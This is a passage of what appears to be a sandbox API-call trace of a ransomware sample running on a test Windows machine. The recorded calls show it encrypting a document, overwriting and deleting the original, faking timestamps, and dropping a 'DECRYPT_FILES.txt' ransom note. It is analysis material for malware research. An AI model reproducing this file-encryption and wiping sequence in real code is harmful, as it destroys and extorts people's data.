"c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\oop6pkrig\\jesejqueiyxiob-zge6.odt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x384 [0070.922] GetFileType (hFile=0x384) returned 0x1 [0070.922] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5cfa0) returned 1 [0070.922] GetFileType (hFile=0x384) returned 0x1 [0070.922] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OoP6PKriG\\D306533615AEC468ACB045D734CDBA2D", nBufferLength=0x105, lpBuffer=0x1bf5cb50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OoP6PKriG\\D306533615AEC468ACB045D734CDBA2D", lpFilePart=0x0) returned 0x50 [0070.922] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d030) returned 1 [0070.922] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OoP6PKriG\\D306533615AEC468ACB045D734CDBA2D" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\oop6pkrig\\d306533615aec468acb045d734cdba2d"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x300 [0070.923] GetFileType (hFile=0x300) returned 0x1 [0070.923] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5cfa0) returned 1 [0070.923] GetFileType (hFile=0x300) returned 0x1 [0070.923] ReadFile (in: hFile=0x384, lpBuffer=0x2211ab0, nNumberOfBytesToRead=0x14000, lpNumberOfBytesRead=0x1bf5d128, lpOverlapped=0x0 | out: lpBuffer=0x2211ab0*, lpNumberOfBytesRead=0x1bf5d128*=0xf41, lpOverlapped=0x0) returned 1 [0070.924] CryptEncrypt (in: hKey=0x1a626c20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2225ac8*, pdwDataLen=0x1bf5d180*=0xf40, dwBufLen=0xf40 | out: pbData=0x2225ac8*, pdwDataLen=0x1bf5d180*=0xf40) returned 1 [0070.924] ReadFile (in: hFile=0x384, lpBuffer=0x2211ab0, nNumberOfBytesToRead=0x14000, lpNumberOfBytesRead=0x1bf5d128, lpOverlapped=0x0 | out: lpBuffer=0x2211ab0*, lpNumberOfBytesRead=0x1bf5d128*=0x0, lpOverlapped=0x0) returned 1 [0070.924] CryptEncrypt (in: hKey=0x1a626c20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2227a60*, pdwDataLen=0x1bf5d0c0*=0x10, dwBufLen=0x10 | out: pbData=0x2227a60*, pdwDataLen=0x1bf5d0c0*=0x10) returned 1 [0070.925] CryptEncrypt (in: hKey=0x1a626c20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2227ab0*, pdwDataLen=0x1bf5d0c0*=0x0, dwBufLen=0x10 | out: pbData=0x2227ab0*, pdwDataLen=0x1bf5d0c0*=0x10) returned 1 [0070.925] WriteFile (in: hFile=0x300, lpBuffer=0x2226a48*, nNumberOfBytesToWrite=0xf50, lpNumberOfBytesWritten=0x1bf5d048, lpOverlapped=0x0 | out: lpBuffer=0x2226a48*, lpNumberOfBytesWritten=0x1bf5d048*=0xf50, lpOverlapped=0x0) returned 1 [0070.926] CloseHandle (hObject=0x300) returned 1 [0070.926] CloseHandle (hObject=0x384) returned 1 [0070.926] CryptDestroyKey (hKey=0x1a626bb0) returned 1 [0070.926] CryptReleaseContext (hProv=0x1a5b6e10, dwFlags=0x0) returned 1 [0070.927] CryptReleaseContext (hProv=0x1a5b6e10, dwFlags=0x0) returned 1 [0070.927] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OoP6PKriG\\D306533615AEC468ACB045D734CDBA2D", nBufferLength=0x105, lpBuffer=0x1bf5cb80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OoP6PKriG\\D306533615AEC468ACB045D734CDBA2D", lpFilePart=0x0) returned 0x50 [0070.927] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d060) returned 1 [0070.927] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OoP6PKriG\\D306533615AEC468ACB045D734CDBA2D" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\oop6pkrig\\d306533615aec468acb045d734cdba2d"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x384 [0070.927] GetFileType (hFile=0x384) returned 0x1 [0070.927] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5cfd0) returned 1 [0070.927] GetFileType (hFile=0x384) returned 0x1 [0070.927] ReadFile (in: hFile=0x384, lpBuffer=0x22281f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x22281f0*, lpNumberOfBytesRead=0x1bf5d148*=0xf50, lpOverlapped=0x0) returned 1 [0070.928] ReadFile (in: hFile=0x384, lpBuffer=0x22281f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x22281f0*, lpNumberOfBytesRead=0x1bf5d148*=0x0, lpOverlapped=0x0) returned 1 [0070.928] CloseHandle (hObject=0x384) returned 1 [0070.983] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OoP6PKriG\\D306533615AEC468ACB045D734CDBA2D.info", nBufferLength=0x105, lpBuffer=0x1bf5c900, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OoP6PKriG\\D306533615AEC468ACB045D734CDBA2D.info", lpFilePart=0x0) returned 0x55 [0070.983] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5cde0) returned 1 [0070.983] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OoP6PKriG\\D306533615AEC468ACB045D734CDBA2D.info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\oop6pkrig\\d306533615aec468acb045d734cdba2d.info"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x384 [0070.984] GetFileType (hFile=0x384) returned 0x1 [0070.984] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5cd50) returned 1 [0070.984] GetFileType (hFile=0x384) returned 0x1 [0070.984] WriteFile (in: hFile=0x384, lpBuffer=0x226c248*, nNumberOfBytesToWrite=0x77d, lpNumberOfBytesWritten=0x1bf5ceb8, lpOverlapped=0x0 | out: lpBuffer=0x226c248*, lpNumberOfBytesWritten=0x1bf5ceb8*=0x77d, lpOverlapped=0x0) returned 1 [0070.985] CloseHandle (hObject=0x384) returned 1 [0070.986] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OoP6PKriG\\JESejqUeIyXIob-ZgE6.odt", nBufferLength=0x105, lpBuffer=0x1bf5cd30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OoP6PKriG\\JESejqUeIyXIob-ZgE6.odt", lpFilePart=0x0) returned 0x47 [0070.986] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d170) returned 1 [0070.986] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OoP6PKriG\\JESejqUeIyXIob-ZgE6.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\oop6pkrig\\jesejqueiyxiob-zge6.odt"), fInfoLevelId=0x0, lpFileInformation=0x1bf5d250 | out: lpFileInformation=0x1bf5d250*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfcd14180, ftCreationTime.dwHighDateTime=0x1d4c5e2, ftLastAccessTime.dwLowDateTime=0x22308550, ftLastAccessTime.dwHighDateTime=0x1d4c9f6, ftLastWriteTime.dwLowDateTime=0x22308550, ftLastWriteTime.dwHighDateTime=0x1d4c9f6, nFileSizeHigh=0x0, nFileSizeLow=0xf41)) returned 1 [0070.986] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d130) returned 1 [0070.986] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OoP6PKriG\\JESejqUeIyXIob-ZgE6.odt", nBufferLength=0x105, lpBuffer=0x1bf5cd30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OoP6PKriG\\JESejqUeIyXIob-ZgE6.odt", lpFilePart=0x0) returned 0x47 [0070.986] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OoP6PKriG\\JESejqUeIyXIob-ZgE6.odt", dwFileAttributes=0x80) returned 1 [0070.987] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OoP6PKriG\\JESejqUeIyXIob-ZgE6.odt", nBufferLength=0x105, lpBuffer=0x1bf5cd30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OoP6PKriG\\JESejqUeIyXIob-ZgE6.odt", lpFilePart=0x0) returned 0x47 [0070.987] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d1b0) returned 1 [0070.987] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OoP6PKriG\\JESejqUeIyXIob-ZgE6.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\oop6pkrig\\jesejqueiyxiob-zge6.odt"), fInfoLevelId=0x0, lpFileInformation=0x2273e70 | out: lpFileInformation=0x2273e70*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfcd14180, ftCreationTime.dwHighDateTime=0x1d4c5e2, ftLastAccessTime.dwLowDateTime=0x22308550, ftLastAccessTime.dwHighDateTime=0x1d4c9f6, ftLastWriteTime.dwLowDateTime=0x22308550, ftLastWriteTime.dwHighDateTime=0x1d4c9f6, nFileSizeHigh=0x0, nFileSizeLow=0xf41)) returned 1 [0070.987] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d170) returned 1 [0070.987] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OoP6PKriG\\JESejqUeIyXIob-ZgE6.odt", nBufferLength=0x105, lpBuffer=0x1bf5cbc0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OoP6PKriG\\JESejqUeIyXIob-ZgE6.odt", lpFilePart=0x0) returned 0x47 [0070.987] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d0a0) returned 1 [0070.987] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OoP6PKriG\\JESejqUeIyXIob-ZgE6.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\oop6pkrig\\jesejqueiyxiob-zge6.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x384 [0070.988] GetFileType (hFile=0x384) returned 0x1 [0070.988] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d010) returned 1 [0070.988] GetFileType (hFile=0x384) returned 0x1 [0070.988] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5d208*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5d208*=0) returned 0x0 [0070.988] WriteFile (in: hFile=0x384, lpBuffer=0x2274358*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2274358*, lpNumberOfBytesWritten=0x1bf5d1a8*=0x1000, lpOverlapped=0x0) returned 1 [0070.989] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5d208*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5d208*=0) returned 0x0 [0070.989] WriteFile (in: hFile=0x384, lpBuffer=0x2274358*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2274358*, lpNumberOfBytesWritten=0x1bf5d1a8*=0x1000, lpOverlapped=0x0) returned 1 [0070.989] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5d208*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5d208*=0) returned 0x0 [0070.990] WriteFile (in: hFile=0x384, lpBuffer=0x2274358*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2274358*, lpNumberOfBytesWritten=0x1bf5d1a8*=0x1000, lpOverlapped=0x0) returned 1 [0070.990] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5d208*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5d208*=0) returned 0x0 [0070.991] WriteFile (in: hFile=0x384, lpBuffer=0x2274358*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2274358*, lpNumberOfBytesWritten=0x1bf5d1a8*=0x1000, lpOverlapped=0x0) returned 1 [0070.991] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5d218*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5d218*=0) returned 0x0 [0070.991] SetEndOfFile (hFile=0x384) returned 1 [0070.992] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5d218*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x1bf5d218*=0) returned 0x0 [0070.992] CloseHandle (hObject=0x384) returned 1 [0070.992] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OoP6PKriG\\JESejqUeIyXIob-ZgE6.odt", nBufferLength=0x105, lpBuffer=0x1bf5cb30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OoP6PKriG\\JESejqUeIyXIob-ZgE6.odt", lpFilePart=0x0) returned 0x47 [0070.992] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d010) returned 1 [0070.992] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OoP6PKriG\\JESejqUeIyXIob-ZgE6.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\oop6pkrig\\jesejqueiyxiob-zge6.odt"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x384 [0070.992] GetFileType (hFile=0x384) returned 0x1 [0070.992] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5cf80) returned 1 [0070.992] GetFileType (hFile=0x384) returned 0x1 [0070.992] SetFileTime (hFile=0x384, lpCreationTime=0x1bf5d278, lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 1 [0070.992] CloseHandle (hObject=0x384) returned 1 [0070.993] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OoP6PKriG\\JESejqUeIyXIob-ZgE6.odt", nBufferLength=0x105, lpBuffer=0x1bf5cb30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OoP6PKriG\\JESejqUeIyXIob-ZgE6.odt", lpFilePart=0x0) returned 0x47 [0070.993] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d010) returned 1 [0070.993] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OoP6PKriG\\JESejqUeIyXIob-ZgE6.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\oop6pkrig\\jesejqueiyxiob-zge6.odt"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x384 [0070.993] GetFileType (hFile=0x384) returned 0x1 [0070.993] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5cf80) returned 1 [0070.993] GetFileType (hFile=0x384) returned 0x1 [0070.993] SetFileTime (hFile=0x384, lpCreationTime=0x0, lpLastAccessTime=0x1bf5d278, lpLastWriteTime=0x0) returned 1 [0070.993] CloseHandle (hObject=0x384) returned 1 [0070.993] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OoP6PKriG\\JESejqUeIyXIob-ZgE6.odt", nBufferLength=0x105, lpBuffer=0x1bf5cb30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OoP6PKriG\\JESejqUeIyXIob-ZgE6.odt", lpFilePart=0x0) returned 0x47 [0070.993] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d010) returned 1 [0070.993] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OoP6PKriG\\JESejqUeIyXIob-ZgE6.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\oop6pkrig\\jesejqueiyxiob-zge6.odt"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x384 [0070.994] GetFileType (hFile=0x384) returned 0x1 [0070.994] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5cf80) returned 1 [0070.994] GetFileType (hFile=0x384) returned 0x1 [0070.994] SetFileTime (hFile=0x384, lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x1bf5d278) returned 1 [0070.994] CloseHandle (hObject=0x384) returned 1 [0070.994] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OoP6PKriG\\JESejqUeIyXIob-ZgE6.odt", nBufferLength=0x105, lpBuffer=0x1bf5cd30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OoP6PKriG\\JESejqUeIyXIob-ZgE6.odt", lpFilePart=0x0) returned 0x47 [0070.994] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OoP6PKriG\\JESejqUeIyXIob-ZgE6.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\oop6pkrig\\jesejqueiyxiob-zge6.odt")) returned 1 [0070.995] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OoP6PKriG\\JESejqUeIyXIob-ZgE6.odt", nBufferLength=0x105, lpBuffer=0x1bf5ce00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OoP6PKriG\\JESejqUeIyXIob-ZgE6.odt", lpFilePart=0x0) returned 0x47 [0070.995] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OoP6PKriG\\D306533615AEC468ACB045D734CDBA2D", nBufferLength=0x105, lpBuffer=0x1bf5cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OoP6PKriG\\D306533615AEC468ACB045D734CDBA2D", lpFilePart=0x0) returned 0x50 [0070.995] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d0b0) returned 1 [0070.995] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OoP6PKriG\\D306533615AEC468ACB045D734CDBA2D" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\oop6pkrig\\d306533615aec468acb045d734cdba2d"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x384 [0070.995] GetFileType (hFile=0x384) returned 0x1 [0070.995] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d020) returned 1 [0070.996] GetFileType (hFile=0x384) returned 0x1 [0070.996] SetFileTime (hFile=0x384, lpCreationTime=0x1bf5d318, lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 1 [0070.996] CloseHandle (hObject=0x384) returned 1 [0070.996] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OoP6PKriG\\D306533615AEC468ACB045D734CDBA2D", nBufferLength=0x105, lpBuffer=0x1bf5cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OoP6PKriG\\D306533615AEC468ACB045D734CDBA2D", lpFilePart=0x0) returned 0x50 [0070.996] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d0b0) returned 1 [0070.996] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OoP6PKriG\\D306533615AEC468ACB045D734CDBA2D" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\oop6pkrig\\d306533615aec468acb045d734cdba2d"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x384 [0070.996] GetFileType (hFile=0x384) returned 0x1 [0070.996] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d020) returned 1 [0070.996] GetFileType (hFile=0x384) returned 0x1 [0070.996] SetFileTime (hFile=0x384, lpCreationTime=0x0, lpLastAccessTime=0x1bf5d318, lpLastWriteTime=0x0) returned 1 [0070.996] CloseHandle (hObject=0x384) returned 1 [0070.996] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OoP6PKriG\\D306533615AEC468ACB045D734CDBA2D", nBufferLength=0x105, lpBuffer=0x1bf5cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OoP6PKriG\\D306533615AEC468ACB045D734CDBA2D", lpFilePart=0x0) returned 0x50 [0070.996] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d0b0) returned 1 [0070.996] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OoP6PKriG\\D306533615AEC468ACB045D734CDBA2D" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\oop6pkrig\\d306533615aec468acb045d734cdba2d"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x384 [0070.996] GetFileType (hFile=0x384) returned 0x1 [0070.997] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d020) returned 1 [0070.997] GetFileType (hFile=0x384) returned 0x1 [0070.997] SetFileTime (hFile=0x384, lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x1bf5d318) returned 1 [0070.997] CloseHandle (hObject=0x384) returned 1 [0070.997] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OoP6PKriG\\DECRYPT_FILES.txt", nBufferLength=0x105, lpBuffer=0x1bf5cd10, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OoP6PKriG\\DECRYPT_FILES.txt", lpFilePart=0x0) returned 0x41 [0070.997] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d1f0) returned 1 [0070.997] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OoP6PKriG\\DECRYPT_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\oop6pkrig\\decrypt_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x384 [0070.997] GetFileType (hFile=0x384) returned 0x1 [0070.998] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d160) returned 1 [0070.998] GetFileType (hFile=0x384) returned 0x1 [0070.998] WriteFile (in: hFile=0x384, lpBuffer=0x2277eb8*, nNumberOfBytesToWrite=0x9d5, lpNumberOfBytesWritten=0x1bf5d238, lpOverlapped=0x0 | out: lpBuffer=0x2277eb8*, lpNumberOfBytesWritten=0x1bf5d238*=0x9d5, lpOverlapped=0x0) returned 1 [0070.999] CloseHandle (hObject=0x384) returned 1 [0070.999] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d280) returned 1 [0070.999] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YlFbY0GE9kU8pLG", nBufferLength=0x105, lpBuffer=0x1bf5cd70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YlFbY0GE9kU8pLG", lpFilePart=0x0) returned 0x35 [0070.999] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YlFbY0GE9kU8pLG\\", nBufferLength=0x105, lpBuffer=0x1bf5cd10, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YlFbY0GE9kU8pLG\\", lpFilePart=0x0) returned 0x36 [0070.999] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YlFbY0GE9kU8pLG\\*", lpFindFileData=0x1bf5cf20 | out: lpFindFileData=0x1bf5cf20*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc12330e0, ftCreationTime.dwHighDateTime=0x1d4d207, ftLastAccessTime.dwLowDateTime=0x9e334ef0, ftLastAccessTime.dwHighDateTime=0x1d4c66b, ftLastWriteTime.dwLowDateTime=0x9e334ef0, ftLastWriteTime.dwHighDateTime=0x1d4c66b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5de0f0 [0071.000] FindNextFileW (in: hFindFile=0x1a5de0f0, lpFindFileData=0x1bf5cf70 | out: lpFindFileData=0x1bf5cf70*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc12330e0, ftCreationTime.dwHighDateTime=0x1d4d207, ftLastAccessTime.dwLowDateTime=0x9e334ef0, ftLastAccessTime.dwHighDateTime=0x1d4c66b, ftLastWriteTime.dwLowDateTime=0x9e334ef0, ftLastWriteTime.dwHighDateTime=0x1d4c66b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.000] FindNextFileW (in: hFindFile=0x1a5de0f0, lpFindFileData=0x1bf5cf70 | out: lpFindFileData=0x1bf5cf70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6cfc9fc0, ftCreationTime.dwHighDateTime=0x1d4c7cf, ftLastAccessTime.dwLowDateTime=0x89ac1bc0, ftLastAccessTime.dwHighDateTime=0x1d4d20e, ftLastWriteTime.dwLowDateTime=0x89ac1bc0, ftLastWriteTime.dwHighDateTime=0x1d4d20e, nFileSizeHigh=0x0, nFileSizeLow=0x1303, dwReserved0=0x0, dwReserved1=0x0, cFileName="ALHCi.gif", cAlternateFileName="")) returned 1 [0071.000] FindNextFileW (in: hFindFile=0x1a5de0f0, lpFindFileData=0x1bf5cf70 | out: lpFindFileData=0x1bf5cf70*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54a845d0, ftCreationTime.dwHighDateTime=0x1d4ca9c, ftLastAccessTime.dwLowDateTime=0xc590bdf0, ftLastAccessTime.dwHighDateTime=0x1d4d2e8, ftLastWriteTime.dwLowDateTime=0xc590bdf0, ftLastWriteTime.dwHighDateTime=0x1d4d2e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MNCF5miF", cAlternateFileName="")) returned 1 [0071.000] FindNextFileW (in: hFindFile=0x1a5de0f0, lpFindFileData=0x1bf5cf70 | out: lpFindFileData=0x1bf5cf70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0e9010, 